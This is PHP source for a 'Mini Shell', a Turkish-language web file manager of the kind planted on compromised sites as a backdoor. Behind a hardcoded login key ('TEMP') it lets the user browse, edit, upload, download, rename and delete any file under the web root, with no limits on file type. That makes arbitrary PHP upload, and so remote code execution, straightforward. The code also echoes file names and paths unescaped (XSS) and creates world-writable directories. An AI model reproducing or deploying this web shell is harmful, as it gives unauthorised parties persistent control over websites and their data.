Mini Shell
<?php
session_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Konfigürasyon
$adminKey = "TEMP"; // Giriş anahtarı
$rootDir = realpath($_SERVER['DOCUMENT_ROOT']); // Erişim sınırı
// CSRF Token
if (empty($_SESSION['csrf_token'])) {
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
// Giriş ve Çıkış
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
if (!isset($_SESSION['logged_in'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['key'] ?? '') === $adminKey) {
$_SESSION['logged_in'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
?>
<form method="POST" style="margin:100px auto; max-width:400px; text-align:center;">
<h2>Giriş</h2>
<input type="text" name="key" placeholder="Anahtar" required style="padding:10px;"><br><br>
<button type="submit" style="padding:10px;">Giriş Yap</button>
</form>
<?php
exit;
}
// Yol ayarla
$path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
if (!$path || strpos($path, $rootDir) !== 0) {
die("Erişim reddedildi.");
}
// Yardımcı Fonksiyonlar
// ==== Yardımcı Geliştirmeler (cPanel tarzı, Undo ve İndirme) ====
function ensureTrash($rootDir) {
$trash = $rootDir . DIRECTORY_SEPARATOR . '.trash';
if (!is_dir($trash)) { @mkdir($trash, 0777, true); }
return $trash;
}function formatBytes($size, $precision = 2) {
$base = log($size, 1024);
$suffixes = array('', 'KB', 'MB', 'GB', 'TB');
return $size == 0 ? '0' : round(pow(1024, $base - floor($base)), $precision) . ' ' . $suffixes[floor($base)];
}function rrmdir($dir) {
if (!is_dir($dir)) { return; }
foreach (array_diff(scandir($dir), ['.','..']) as $f) {
$p = $dir . DIRECTORY_SEPARATOR . $f;
if (is_dir($p)) { rrmdir($p); } else { @unlink($p); }
}
@rmdir($dir);
}function rcopy($src, $dst) {
$dir = opendir($src);
@mkdir($dst, 0777, true);
while(false !== ($file = readdir($dir))) {
if (($file != '.') && ($file != '..')) {
$srcPath = $src . DIRECTORY_SEPARATOR . $file;
$dstPath = $dst . DIRECTORY_SEPARATOR . $file;
if (is_dir($srcPath)) { rcopy($srcPath, $dstPath); }
else { copy($srcPath, $dstPath); }
}
}
closedir($dir);
}function pushUndo($type, $data) {
$_SESSION['last_undo'] = ['type' => $type, 'data' => $data];
}function performUndo() {
global $rootDir;
if (empty($_SESSION['last_undo'])) { echo "<p>Geri alınacak işlem yok.</p>"; return; }
$undo = $_SESSION['last_undo'];
$type = $undo['type'];
$d = $undo['data'];
$ok = false;
if ($type === 'rename') {
// reverse rename
if (file_exists($d['to'])) {
$ok = @rename($d['to'], $d['from']);
}
} elseif ($type === 'delete') {
// restore from trash
if (!empty($d['trash']) && file_exists($d['trash'])) {
$dest = $d['original'];
// Ensure parent exists
@mkdir(dirname($dest), 0777, true);
$ok = @rename($d['trash'], $dest);
}
} elseif ($type === 'mkdir') {
// remove created dir
if (is_dir($d['path'])) { rrmdir($d['path']); $ok = true; }
} elseif ($type === 'upload' || $type === 'createFile') {
// remove created file
if (is_file($d['path'])) { @unlink($d['path']); $ok = true; }
} elseif ($type === 'edit') {
// restore backup content
if (!empty($d['backup']) && file_exists($d['backup'])) {
// overwrite original
if (is_dir(dirname($d['path']))) {
$ok = @copy($d['backup'], $d['path']);
}
}
}
if ($ok) { echo "<p>Son işlem geri alındı.</p>"; $_SESSION['last_undo'] = null; }
else { echo "<p>Geri alma başarısız.</p>"; }
}function downloadFile($filePath) {
if (!is_file($filePath)) { die("Dosya bulunamadı."); }
$name = basename($filePath);
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filePath));
readfile($filePath);
exit;
}function listDirectory($path) {
$items = array_diff(scandir($path), ['.', '..']);
echo "<table style='width:100%; background:#fff; border-collapse:collapse; box-shadow:0 1px 3px rgba(0,0,0,0.08)'>";
echo "<tr style='background:#f0f4f8'><th style='text-align:left;padding:8px'>İsim</th><th>Tip</th><th>Boyut</th><th>Güncellenme</th><th>İşlemler</th></tr>";
foreach ($items as $item) {
$itemPath = realpath($path . DIRECTORY_SEPARATOR . $item);
if (!$itemPath) continue;
$isDir = is_dir($itemPath);
$type = $isDir ? "Klasör" : "Dosya";
$size = $isDir ? "-" : (is_file($itemPath) ? formatBytes(filesize($itemPath)) : "-");
$mtime = date("Y-m-d H:i", filemtime($itemPath));
echo "<tr>";
if ($isDir) {
echo "<td style='padding:8px'><a href='?path=" . urlencode($itemPath) . "'>📁 $item</a></td>";
} else {
echo "<td style='padding:8px'>📄 $item</td>";
}
echo "<td style='text-align:center'>$type</td>";
echo "<td style='text-align:center'>$size</td>";
echo "<td style='text-align:center'>$mtime</td>";
echo "<td style='text-align:center'>";
if ($isDir) {
echo "<a href='?path=" . urlencode($path) . "&action=rename&item=" . urlencode($item) . "'>Yeniden Adlandır</a> | ";
echo "<a href='?path=" . urlencode($path) . "&action=delete&item=" . urlencode($item) . "' onclick='return confirm(\"Silinsin mi?\")'>Sil</a>";
} else {
echo "<a href='?path=" . urlencode($path) . "&action=edit&item=" . urlencode($item) . "'>Düzenle</a> | ";
echo "<a href='?path=" . urlencode($path) . "&action=download&item=" . urlencode($item) . "'>İndir</a> | ";
echo "<a href='?path=" . urlencode($path) . "&action=rename&item=" . urlencode($item) . "'>Yeniden Adlandır</a> | ";
echo "<a href='?path=" . urlencode($path) . "&action=delete&item=" . urlencode($item) . "' onclick='return confirm(\"Silinsin mi?\")'>Sil</a>";
}
echo "</td>";
echo "</tr>";
}
echo "</table>";
}function editFile($filePath) {
if (!file_exists($filePath)) return;
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['csrf_token'] === $_SESSION['csrf_token']) {
// Yedek al
$root = realpath($_SERVER['DOCUMENT_ROOT']);
$trash = ensureTrash($root);
$backup = $trash . DIRECTORY_SEPARATOR . uniqid(basename($filePath) . "_backup_", true);
@copy($filePath, $backup);
if (isset($_POST['content'])) {
if (file_put_contents($filePath, $_POST['content']) !== false) {
pushUndo('edit', ['path' => $filePath, 'backup' => $backup]);
echo "<p>Kaydedildi.</p>";
} else {
echo "<p style='color:red;'>Kaydetme hatası.</p>";
}
} else {
echo "<p style='color:red;'>Boş içerik kaydedilemez.</p>";
}
}
$content = htmlspecialchars(file_get_contents($filePath));
echo "<form method='POST'>
<input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'>
<textarea name='content' style='width:100%; height:300px;'>$content</textarea><br>
<button type='submit'>Kaydet</button>
</form>";
}function renameFile($filePath) {
if (!file_exists($filePath)) return;
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['new_name'])) {
$newName = basename($_POST['new_name']);
$newPath = dirname($filePath) . DIRECTORY_SEPARATOR . $newName;
if (!file_exists($newPath)) {
if (@rename($filePath, $newPath)) {
pushUndo('rename', ['from' => $filePath, 'to' => $newPath]);
echo "<p>Yeniden adlandırıldı.</p>";
} else {
echo "<p style='color:red;'>Yeniden adlandırma hatası.</p>";
}
} else {
echo "<p style='color:red;'>Bu isimde dosya/klasör zaten var.</p>";
}
}
echo "<form method='POST'>
<input type='text' name='new_name' placeholder='Yeni ad'><br>
<button type='submit'>Yeniden Adlandır</button>
</form>";
}function deleteFile($filePath) {
if (file_exists($filePath)) {
$root = realpath($_SERVER['DOCUMENT_ROOT']);
$trash = ensureTrash($root);
$trashTarget = $trash . DIRECTORY_SEPARATOR . uniqid(basename($filePath) . "_", true);
if (@rename($filePath, $trashTarget)) {
pushUndo('delete', ['trash' => $trashTarget, 'original' => $filePath]);
echo "<p>Silindi (Çöp kutusuna taşındı).</p>";
} else {
echo "<p style='color:red;'>Silme hatası.</p>";
}
} else {
echo "<p>Dosya bulunamadı.</p>";
}
}function uploadFile($path) {
if (!empty($_FILES['file']['name'])) {
$target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
pushUndo('upload', ['path' => $target]);
echo "<p>Yüklendi.</p>";
} else {
echo "<p style='color:red;'>Yükleme hatası.</p>";
}
}
}function createFolder($path) {
if (!empty($_POST['folder_name'])) {
$folder = $path . DIRECTORY_SEPARATOR . basename($_POST['folder_name']);
if (!file_exists($folder)) {
if (@mkdir($folder)) {
pushUndo('mkdir', ['path' => $folder]);
echo "<p>Klasör oluşturuldu.</p>";
} else {
echo "<p style='color:red;'>Klasör oluşturulamadı.</p>";
}
} else {
echo "<p>Klasör zaten var.</p>";
}
}
}function createFile($path) {
if (!empty($_POST['file_name'])) {
$file = $path . DIRECTORY_SEPARATOR . basename($_POST['file_name']);
if (!file_exists($file)) {
if (file_put_contents($file, '') !== false) {
pushUndo('createFile', ['path' => $file]);
echo "<p>Dosya oluşturuldu.</p>";
} else {
echo "<p style='color:red;'>Dosya oluşturulamadı.</p>";
}
} else {
echo "<p>Dosya zaten var.</p>";
}
}
}
// POST işlemleri
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) die("CSRF Hatası!");
if (isset($_FILES['file'])) uploadFile($path);
if (isset($_POST['folder_name'])) createFolder($path);
if (isset($_POST['file_name'])) createFile($path);
}
// HTML
echo "<style>
body { font-family: Arial, sans-serif; padding: 20px; background: #f1f5f9; color:#0f172a }
input, button { padding: 8px; margin: 5px; }
a { text-decoration: none; color: blue; }
</style>";
echo "<h2>🗂️ Dosya Yöneticisi</h2>";
echo "<p>Mevcut Dizin: <b>$path</b></p>";
echo "<a href='?path=" . urlencode(dirname($path)) . "'>⬆️ Bir Üst Dizin</a> | <a href='?logout=1'>🔓 Çıkış Yap</a><hr>";
echo "<div style='display:flex;gap:8px;align-items:center;margin:10px 0'>
<a href='?path=" . urlencode(dirname($path)) . "' style='padding:6px 10px; background:#e2e8f0; border-radius:8px'>⬆️ Bir Üst Dizin</a>
<a href='?path=" . urlencode($path) . "' style='padding:6px 10px; background:#e2e8f0; border-radius:8px'>🔄 Yenile</a>
<a href='?path=" . urlencode($path) . "&undo=1' style='padding:6px 10px; background:#fde68a; border-radius:8px'>↩️ Geri Al</a>
<span style='margin-left:auto'></span>
<a href='?logout=1' style='padding:6px 10px; background:#fecaca; border-radius:8px'>🔓 Çıkış Yap</a>
</div><hr>";
// Eylemler
// Geri Al
if (isset($_GET['undo']) && $_GET['undo'] == '1') {
performUndo();
echo "<hr><a href='?path=" . urlencode($path) . "'>↩️ Geri Dön</a>";
exit;
}
if (isset($_GET['action'], $_GET['item'])) {
$item = basename($_GET['item']);
$itemPath = realpath($path . DIRECTORY_SEPARATOR . $item);
if (!$itemPath || strpos($itemPath, $rootDir) !== 0) {
die("Yetkisiz işlem.");
}
switch ($_GET['action']) {
case 'edit': editFile($itemPath); break;
case 'delete': deleteFile($itemPath); break;
case 'rename': renameFile($itemPath); break;
case 'download': downloadFile($itemPath); break;
}
echo "<hr><a href='?path=" . urlencode($path) . "'>↩️ Geri Dön</a>";
exit;
}
// Listele
listDirectory($path);
// Yükleme / Oluşturma Formları
echo "<h3>⬆️ Dosya Yükle</h3>
<form method='POST' enctype='multipart/form-data'>
<input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'>
<input type='file' name='file'><button type='submit'>Yükle</button>
</form>";
echo "<h3>📁 Klasör Oluştur</h3>
<form method='POST'>
<input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'>
<input type='text' name='folder_name' placeholder='Klasör Adı'><button type='submit'>Oluştur</button>
</form>";
echo "<h3>📄 Dosya Oluştur</h3>
<form method='POST'>
<input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'>
<input type='text' name='file_name' placeholder='Dosya Adı'><button type='submit'>Oluştur</button>
</form>";
?>